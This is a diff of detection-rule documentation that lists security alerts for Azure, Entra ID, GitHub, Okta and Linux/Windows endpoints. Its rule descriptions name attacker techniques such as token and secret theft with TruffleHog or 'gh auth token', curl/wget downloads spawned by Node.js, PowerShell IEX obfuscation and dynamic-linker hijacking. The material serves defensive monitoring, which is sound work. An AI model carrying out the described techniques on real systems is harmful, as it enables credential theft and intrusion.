|[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |105 +|<> |Identifies an invitation to an external user in Azure Active Directory (AD). Azure AD is extended to include collaboration, allowing you to invite people from outside your organization to be guest users in your cloud account. Unless there is a business need to provision guest access, it is best practice to avoid creating guest users. Guest users could potentially be overlooked indefinitely, leading to a potential vulnerability. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of a firewall policy in Azure. An adversary may delete a firewall policy in an attempt to evade defenses and/or to eliminate barriers to their objective. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies the deletion of a firewall policy in Azure. An adversary may delete a firewall policy in an attempt to evade defenses and/or to eliminate barriers to their objective. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in Azure. An adversary may delete a Frontdoor Web Application Firewall (WAF) Policy in an attempt to evade defenses and/or to eliminate barriers to their objective. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in Azure. An adversary may delete a Frontdoor Web Application Firewall (WAF) Policy in an attempt to evade defenses and/or to eliminate barriers to their objective. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies potential full network packet capture in Azure. Packet Capture is an Azure Network Watcher feature that can be used to inspect network traffic. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. |[Domain: Cloud], [Data Source: Azure], [Tactic: Credential Access], [Resources: Investigation Guide] |None |106 +|<> |Identifies potential full network packet capture in Azure. Packet Capture is an Azure Network Watcher feature that can be used to inspect network traffic. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. |[Domain: Cloud], [Data Source: Azure], [Tactic: Credential Access], [Resources: Investigation Guide] |None |107 -|<> |Identifies an Azure Active Directory (AD) Global Administrator role addition to a Privileged Identity Management (PIM) user account. PIM is a service that enables you to manage, control, and monitor access to important resources in an organization. Users who are assigned to the Global administrator role can read and modify any administrative setting in your Azure AD organization. 
|[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies an Azure Active Directory (AD) Global Administrator role addition to a Privileged Identity Management (PIM) user account. PIM is a service that enables you to manage, control, and monitor access to important resources in an organization. Users who are assigned to the Global administrator role can read and modify any administrative setting in your Azure AD organization. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 |<> |Identifies modifications to a Key Vault in Azure. The Key Vault is a service that safeguards encryption keys and secrets like certificates, connection strings, and passwords. Because this data is sensitive and business critical, access to key vaults should be secured to allow only authorized applications and users. This is a New Terms rule that detects when this activity hasn't been seen by the user in a specified time frame. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Azure Activity Logs], [Tactic: Impact], [Use Case: Configuration Audit], [Resources: Investigation Guide] |None |107 |<> |Identifies secrets, keys, or certificates retrieval operations from Azure Key Vault by a user principal that has not been seen previously doing so in a certain amount of days. Azure Key Vault is a cloud service for securely storing and accessing secrets, keys, and certificates. Unauthorized or excessive retrievals may indicate potential abuse or unauthorized access attempts. |[Domain: Cloud], [Domain: Storage], [Domain: Identity], [Data Source: Azure], [Data Source: Azure Platform Logs], [Data Source: Azure Key Vault], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 -|<> |Identifies when events are deleted in Azure Kubernetes. Kubernetes events are objects that log any state changes. Example events are a container creation, an image pull, or a pod scheduling on a node. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies when events are deleted in Azure Kubernetes. Kubernetes events are objects that log any state changes. Example events are a container creation, an image pull, or a pod scheduling on a node. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kubernetes pod to disrupt the normal behavior of the environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Asset Visibility], [Tactic: Impact], [Resources: Investigation Guide] |None |105 +|<> |Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kubernetes pod to disrupt the normal behavior of the environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Asset Visibility], [Tactic: Impact], [Resources: Investigation Guide] |None |106 -|<> |Identifies the creation of role binding or cluster role bindings. 
You can assign these roles to Kubernetes subjects (users, groups, or service accounts) with role bindings and cluster role bindings. An adversary who has permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high privileges roles. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |105 +|<> |Identifies the creation of role binding or cluster role bindings. You can assign these roles to Kubernetes subjects (users, groups, or service accounts) with role bindings and cluster role bindings. An adversary who has permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high-privilege roles. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of a Network Watcher in Azure. Network Watchers are used to monitor, diagnose, view metrics, and enable or disable logs for resources in an Azure virtual network. An adversary may delete a Network Watcher in an attempt to evade defenses. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies the deletion of a Network Watcher in Azure. Network Watchers are used to monitor, diagnose, view metrics, and enable or disable logs for resources in an Azure virtual network. An adversary may delete a Network Watcher in an attempt to evade defenses. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 |<> |Detects when Azure OpenAI requests result in zero response length, potentially indicating issues in output handling that might lead to security exploits such as data leaks or code execution. This can occur in cases where the API fails to handle outputs correctly under certain input conditions. |[Domain: LLM], [Data Source: Azure OpenAI], [Data Source: Azure Event Hubs], [Use Case: Insecure Output Handling], [Resources: Investigation Guide] |None |3 -|<> |Azure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator. An adversary may add a user to a PIM role in order to maintain persistence in their target's environment or modify a PIM role to weaken their target's security controls. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Persistence] |None |107 +|<> |Azure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator. An adversary may add a user to a PIM role in order to maintain persistence in their target's environment or modify a PIM role to weaken their target's security controls. 
|[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Persistence] |None |108 + +|<> |Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. |[Domain: Cloud], [Data Source: Azure], [Data Source: Azure Activity Logs], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |1 + +|<> |Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Impact], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Impact], [Resources: Investigation Guide] |None |105 +|<> |Identifies when Azure Storage Account Blob public access is enabled, allowing external access to blob containers. This technique was observed in cloud ransom-based campaigns where threat actors modified storage accounts to expose non-remotely accessible accounts to the internet for data exfiltration. Adversaries abuse the Microsoft.Storage/storageAccounts/write operation to modify public access settings. |[Domain: Cloud], [Domain: Storage], [Data Source: Azure], [Data Source: Azure Activity Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |1 -|<> |Identifies a rotation to storage account access keys in Azure. Regenerating access keys can affect any applications or Azure services that are dependent on the storage account key. Adversaries may regenerate a key as a means of acquiring credentials to access systems and resources. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |105 +|<> |Identifies a rotation to storage account access keys in Azure. Regenerating access keys can affect any applications or Azure services that are dependent on the storage account key. Adversaries may regenerate a key as a means of acquiring credentials to access systems and resources. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |106 + +|<> |Identifies unusual high-privileged access to Azure Storage Account keys by users with Owner, Contributor, or Storage Account Contributor roles. This technique was observed in STORM-0501 ransomware campaigns where compromised identities with high-privilege Azure RBAC roles retrieved access keys to perform unauthorized operations on Storage Accounts. Microsoft recommends using Shared Access Signature (SAS) models instead of direct key access for improved security. 
This rule detects when a user principal with high-privilege roles accesses storage keys for the first time in 7 days. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Azure Activity Logs], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 |<> |Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: TripleCross], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |213 @@ -558,6 +564,8 @@ and their rule type is `machine_learning`. |<> |Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |313 +|<> |This rule detects the execution of TruffleHog, a tool used to search for high-entropy strings and secrets in code repositories, which may indicate an attempt to access credentials. This tool was abused by the Shai-Hulud worm to search for credentials in code repositories. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 + |<> |Identifies attempts to export a registry hive which may contain credentials using the Windows reg.exe tool. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Sysmon], [Data Source: Crowdstrike] |None |315 |<> |Elastic Endgame detected Credential Dumping. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |105 @@ -568,7 +576,7 @@ and their rule type is `machine_learning`. |<> |Elastic Endgame prevented Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |105 -|<> |This rule monitors for (ana)cron jobs being created or renamed. 
Linux cron jobs are scheduled tasks that can be leveraged by system administrators to set up scheduled tasks, but may be abused by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |17 +|<> |This rule monitors for (ana)cron jobs being created or renamed. Linux cron jobs are scheduled tasks that can be leveraged by system administrators to set up scheduled tasks, but may be abused by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |18 |<> |Generates a detection alert for each CrowdStrike alert written to the configured indices. Enabling this rule allows you to immediately begin investigating CrowdStrike alerts in the app. |[Data Source: Crowdstrike], [Use Case: Threat Detection], [Resources: Investigation Guide], [Promotion: External Alerts] |8.18.0 |2 @@ -576,6 +584,8 @@ and their rule type is `machine_learning`. |<> |This rule detects the use of the `curl` command-line tool with SOCKS proxy options, launched from an unusual parent process. Attackers may use `curl` to establish a SOCKS proxy connection to bypass network restrictions and exfiltrate data or communicate with C2 servers. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |5 +|<> |This rule detects when Node.js, directly or via a shell, spawns the curl or wget command. This may indicate command and control behavior. Adversaries may use Node.js to download additional tools or payloads onto the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 + |<> |Identifies the occurrence of a CyberArk Privileged Access Security (PAS) error level audit event. The event.code correlates to the CyberArk Vault Audit Action Code. |[Data Source: CyberArk PAS], [Use Case: Log Auditing], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |105 |<> |Identifies the occurrence of a CyberArk Privileged Access Security (PAS) non-error level audit event which is recommended for monitoring by the vendor. The event.code correlates to the CyberArk Vault Audit Action Code. |[Data Source: CyberArk PAS], [Use Case: Log Auditing], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |105 @@ -642,11 +652,11 @@ and their rule type is `machine_learning`. |<> |Identifies PowerShell scripts that reconstruct the IEX (Invoke-Expression) command by accessing and indexing the string representation of method references. 
This obfuscation technique uses constructs like ''.IndexOf.ToString() to expose method metadata as a string, then extracts specific characters through indexed access and joins them to form IEX, bypassing static keyword detection and evading defenses such as AMSI. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: PowerShell Logs], [Resources: Investigation Guide] |None |5 -|<> |This rule detects the creation of the dynamic linker (ld.so) file. The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |104 +|<> |This rule detects the creation of the dynamic linker (ld.so). The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |105 |<> |Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |213 -|<> |Detects the creation or modification of files related to the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 +|<> |Detects the creation or modification of files related to the configuration of the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. This technique is often observed by userland rootkits that leverage shared objects to maintain persistence on a compromised host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7 |<> |Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". 
These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |111 @@ -672,7 +682,11 @@ and their rule type is `machine_learning`. |<> |Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts. |[Data Source: Elastic Defend], [Resources: Investigation Guide] |None |108 -|<> |Identifies device code authentication with an Azure broker client for Entra ID. Adversaries abuse Primary Refresh Tokens (PRTs) to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. PRTs are used in Conditional Access policies to enforce device-based controls. Compromising PRTs allows attackers to bypass these policies and gain unauthorized access. This rule detects successful sign-ins using device code authentication with the Entra ID broker client application ID (29d9ed98-a469-4536-ade2-f981bc1d605e). |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |4 +|<> |Identifies potential abuse of actor tokens in Microsoft Entra ID audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) operations, allowing services to perform actions on behalf of users. These tokens appear in logs with the service's display name but the impersonated user's UPN. While some legitimate Microsoft operations use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed unauthorized access to Azure AD Graph API across tenants before being patched by Microsoft. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |1 + +|<> |Identifies device code authentication with an Azure broker client for Entra ID. Adversaries abuse Primary Refresh Tokens (PRTs) to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. PRTs are used in Conditional Access policies to enforce device-based controls. Compromising PRTs allows attackers to bypass these policies and gain unauthorized access. This rule detects successful sign-ins using device code authentication with the Entra ID broker client application ID (29d9ed98-a469-4536-ade2-f981bc1d605e). |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |5 + +|<> |In Microsoft Entra ID, permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Microsoft Entra ID and services that use Microsoft Entra ID identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. 
Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. They can also elevate privilege to User Access Administrator to pivot into Azure resources. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 |<> |Identifies when multi-factor authentication (MFA) is disabled for an Entra ID user account. An adversary may disable MFA for a user account in order to weaken the authentication requirements for the account. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Persistence] |None |109 @@ -680,7 +694,7 @@ and their rule type is `machine_learning`. |<> |Identifies user risk detection events via Microsofts Entra ID Protection service. Entra ID Protection detects user risk activity such as anonymized IP addresses, unlikely travel, password spray, and more. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Use Case: Risk Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |2 -|<> |Identifies when a user signs in with a refresh token using the Microsoft Authentication Broker (MAB) client, followed by a Primary Refresh Token (PRT) sign-in from the same device within 1 hour. This pattern may indicate that an attacker has successfully registered a device using ROADtx and transitioned from short-term token access to long-term persistent access via PRTs. Excluding access to the Device Registration Service (DRS) ensures the PRT is being used beyond registration, often to access Microsoft 365 resources like Outlook or SharePoint. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Tactic: Persistence], [Tactic: Initial Access], [Resources: Investigation Guide] |None |1 +|<> |Identifies when a user signs in with a refresh token using the Microsoft Authentication Broker (MAB) client, followed by a Primary Refresh Token (PRT) sign-in from the same device within 1 hour. This pattern may indicate that an attacker has successfully registered a device using ROADtx and transitioned from short-term token access to long-term persistent access via PRTs. Excluding access to the Device Registration Service (DRS) ensures the PRT is being used beyond registration, often to access Microsoft 365 resources like Outlook or SharePoint. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Tactic: Persistence], [Tactic: Initial Access], [Resources: Investigation Guide] |None |2 |<> |Identifies when a Microsoft Entra ID user signs in from a device that is not typically used by the user, which may indicate potential compromise or unauthorized access attempts. This rule detects unusual sign-in activity by comparing the device used for the sign-in against the user's typical device usage patterns. Adversaries may create and register a new device to obtain a Primary Refresh Token (PRT) and maintain persistent access. 
|[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Resources: Investigation Guide] |None |1 @@ -704,7 +718,7 @@ and their rule type is `machine_learning`. |<> |Identifies an excessive number of Microsoft 365 mailbox items accessed by a user either via aggregated counts or throttling. Microsoft audits mailbox access via the MailItemsAccessed event, which is triggered when a user accesses mailbox items. If more than 1000 mailbox items are accessed within a 24-hour period, it is then throttled. Excessive mailbox access may indicate an adversary attempting to exfiltrate sensitive information or perform reconnaissance on a target's mailbox. This rule detects both the throttled and unthrottled events with a high threshold. |[Domain: Cloud], [Domain: Email], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |1 -|<> |Identifies excessive secret or key retrieval operations from Azure Key Vault. This rule detects when a user principal retrieves secrets or keys from Azure Key Vault multiple times within a short time frame, which may indicate potential abuse or unauthorized access attempts. The rule focuses on high-frequency retrieval operations that deviate from normal user behavior, suggesting possible credential harvesting or misuse of sensitive information. |[Domain: Cloud], [Domain: Storage], [Domain: Identity], [Data Source: Azure], [Data Source: Azure Platform Logs], [Data Source: Azure Key Vault], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 +|<> |Identifies excessive secret or key retrieval operations from Azure Key Vault. This rule detects when a user principal retrieves secrets or keys from Azure Key Vault multiple times within a short time frame, which may indicate potential abuse or unauthorized access attempts. The rule focuses on high-frequency retrieval operations that deviate from normal user behavior, suggesting possible credential harvesting or misuse of sensitive information. |[Domain: Cloud], [Domain: Storage], [Domain: Identity], [Data Source: Azure], [Data Source: Azure Platform Logs], [Data Source: Azure Key Vault], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |3 |<> |Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |None |213 @@ -800,7 +814,7 @@ and their rule type is `machine_learning`. |<> |Detects a first occurrence event for a personal access token (PAT) not seen in the last 14 days. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Execution], [Rule Type: BBR], [Data Source: Github] |None |206 -|<> |Identifies when a user is observed for the first time in the last 14 days authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. 
By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |5 +|<> |Identifies when a user is observed for the first time in the last 14 days authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |6 |<> |Detects an interaction with a private GitHub repository from a new IP address not seen in the last 14 days. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Execution], [Rule Type: BBR], [Data Source: Github] |None |206 @@ -904,6 +918,8 @@ and their rule type is `machine_learning`. |<> |Detects the deletion of a GitHub app either from a repo or an organization. |[Domain: Cloud], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Github], [Resources: Investigation Guide] |None |207 +|<> |This rule detects when the Node.js runtime spawns a shell to execute the GitHub CLI (gh) command to retrieve a GitHub authentication token. The GitHub CLI is a command-line tool that allows users to interact with GitHub from the terminal. The "gh auth token" command is used to retrieve an authentication token for GitHub, which can be used to authenticate API requests and perform actions on behalf of the user. Adversaries may use this technique to access GitHub repositories and potentially exfiltrate sensitive information or perform malicious actions. This activity was observed in the wild as part of the Shai-Hulud worm. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Discovery], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 + |<> |This rule detects when a member is granted the organization owner role of a GitHub organization. This role provides admin level privileges. Any new owner role should be investigated to determine its validity. Unauthorized owner roles could indicate compromise within your organization and provide unlimited access to data and settings. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Persistence], [Data Source: Github], [Resources: Investigation Guide] |None |209 |<> |Access to private GitHub organization resources was revoked for a PAT. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Impact], [Rule Type: BBR], [Data Source: Github] |None |206 @@ -972,7 +988,7 @@ and their rule type is `machine_learning`. |<> |This rule detects a high number of egress network connections from an unusual executable on a Linux system. This could indicate a command and control (C2) communication attempt, a brute force attack via a malware infection, or other malicious activity. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 -|<> |Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |206 +|<> |Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |207 |<> |Identifies a high number of Okta user password reset or account unlock attempts. An adversary may attempt to obtain unauthorized access to Okta user accounts using these methods and attempt to blend in with normal activity in their target's environment and evade detection. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |415 @@ -1018,7 +1034,7 @@ and their rule type is `machine_learning`. |<> |Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to 